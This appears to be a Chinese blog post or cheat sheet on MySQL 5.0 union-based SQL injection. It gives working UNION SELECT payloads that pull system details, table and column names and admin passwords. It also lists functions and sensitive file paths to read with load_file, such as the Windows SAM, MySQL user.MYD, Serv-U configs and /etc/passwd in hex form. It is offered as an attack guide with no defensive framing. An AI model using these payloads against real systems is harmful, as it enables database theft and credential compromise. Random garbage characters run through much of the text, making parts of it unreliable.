mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。



Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
1.得到所有数据库名：
7 V, O8 B6 t, W4 T+ M1 T|SCHEMATA ->存储数据库名的表
|—字段：SCHEMA_NAME ->数据库名称

$ g  ~* c4 a8 N3 n# \/ {|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
, V) n" B1 V2 b) {1 F$ j|—字段：TABLE_NAME ->存储表的表名

  E9 T9 p1 J7 y/ j: I|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称

8 w) }2 F" [8 u4 Y|—字段：COLUMN_NAME ->该字段的名称
( o* O/ N0 w3 }. I( b
6 Y* U+ d) `6 V# K, c. C#########################################################################
##
. p$ o: y4 ?' g+ Z8 `* L
0×001 获取系统信息:
4 r; ?9 @# I9 U6 `
union select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
" a- |$ i5 i1 R% ~% l, B8 ?  j(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
# p  R% ~! n  ~9 e- a' m: `4 U
/*
# R% b2 H0 h4 p0 S2 W  ^
1 d( s2 A9 u7 o' Y$ h2 d5 a@@global.version_compile_os 获取系统版本

1 w8 z: Q6 \+ W, A7 V$ Q' {/ G@@datadir 数据库路径
database() 当前数据库名称
0x3c62723e 换行HEX值
! C" z" |# K  a) ~& N
*/
7 \% X) q( M2 K* j
" M( ]1 V* \0 h: t3 y2 e3 g######################################################################
5 u% ^* r0 @8 c) k3 C
( c& a8 H, H; T$ s0×002 获取表名

5 c- R8 x1 s  c5 M% m/ y4 U; V8 zunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
1 g! G( ]9 X1 B" Oinformation_schema.tables where table_schema=0x67617264656e /*

; K. {  C8 r' K" e* i- G, ?4 r/*
$ D9 i8 T+ H5 Y8 V5 j. O6 @
0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
+ L. ?' u* i( F7 w" a3 s; j
*/
) q1 s$ N3 U: o9 {; Z* S6 l
4 a& I5 S! P" q- X  K, i; Z' \$ {######################################################################
* o. a2 m. s0 N& u8 @0 M9 N
0×003 获取字段
* Q# S; j! D. G3 i
+ d- o/ e4 K2 K+ q( C; k$ d0 W/ Q, qunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from
3 e$ f" l9 L. }# H6 `information_schema.columns where table_name=0x61646d696e and
) L6 T) ^4 n$ x7 x9 W# E% H, E& ?

4 V3 t7 s$ y. ~2 D/ k; ^table_schema=0x67617264656e limit 1 /*

/*
9 _0 Z8 n& H8 K% j6 Z5 h
group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

9 [% o& h  a' P: o7 i0x61646d696e ->选择一个表

2 P2 M! P. `/ x7 a0x67617264656e ->数据库名
+ Z0 O: K; u1 \( Q
# X9 {* w* Q2 A& k. L" ~*/
& {1 [# R, o+ e& e1 p
#####################################################################
: X3 `$ ~; }- S/ M
0×004 获取数据
6 }/ S: L6 _8 A: |2 N; E% b1 F! a+ \
7 t$ {& E2 A$ B0 o& sunion select 1,2,3
0 c/ ^* p& u3 G& U9 g- P,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

union select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin

# }, W2 o  M# H4 P) p. P6 n' u/*

4 B- b* g, L8 R0 g$ P# E0 C0x3c62723e 换行符号HEX编码

, W9 L" t7 [' q2 ~- C0 lgroup_concat 同时获得该字段所有数据

*/

- _0 r& v& `( W, }
5 U- I1 z) `$ E& d0 n


顺便添加一些mysql注入时非常有用的一些东西
% n& H5 |8 s' u" F, b: M8 @/ d9 w7 A
简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
) ~  v3 Z, j) n4 s
/ x2 @/ E" o/ W- [+ x" e1:system_user() 系统用户名
( ~8 ^1 J' j8 U( y) D. _2:user()        用户名
! Z4 {3 w, D3 T3 W7 u# V4 G3:current_user()  当前用户名
+ S. ^* E3 i/ T2 z" @4:session_user()连接数据库的用户名
5:database()    数据库名
2 J8 }* |) `5 \$ R6 r, p5 Q4 \6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
6 B: t& X) F  f- N: h! m: D8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
( j! z; a& J$ F. Q收集的一些路径：
WINDOWS下:
c:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
% ]9 y3 J8 [) Q! Y) Lc:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
  F4 {% j* u2 q" s2 z* o' oc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
5 ]7 F# B1 f% o5 t9 [c:\Program Files\Serv-U\ServUDaemon.ini
8 C& w0 J8 |0 Mc:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
5 Y; v6 W0 }- c+ {# ~4 ^+ R. Sc:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
: P. h9 E" l/ ^: e# Bc:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
! c* l' ]2 t  f//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
- Z( X* W* N8 P$ H  q7 D* l
2 [; h% M; n2 n: q2 m! u' l! k
c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
8 R5 |2 @9 r5 p+ a. E6 a" MC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

. g$ T+ |/ N$ f; B8 e) R5 W& R" TLUNIX/UNIX下:
/ Y8 C2 Z/ \( ]" C' d, A/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
' V8 H9 f: w$ q/etc/my.cnf //mysql的配置文件
2 }) o5 j1 _. r7 D: G: g/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
  H' c5 u6 \- m. S/ T. n( f/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
+ [2 F, q/ u& u/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
) S. |& A; t. X# r/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
5 `8 `) U  y5 \3 e( ^. B/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
) m6 Y% }% p9 i0 c9 {7 @' i$ fload_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
) K1 J) C/ c1 mreplace(load_file(0x2F6574632F706173737764),0x3c,0×20)
" V/ y* h2 J1 |* M* Q1 Areplace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

7 e2 E  [) ?* Q5 i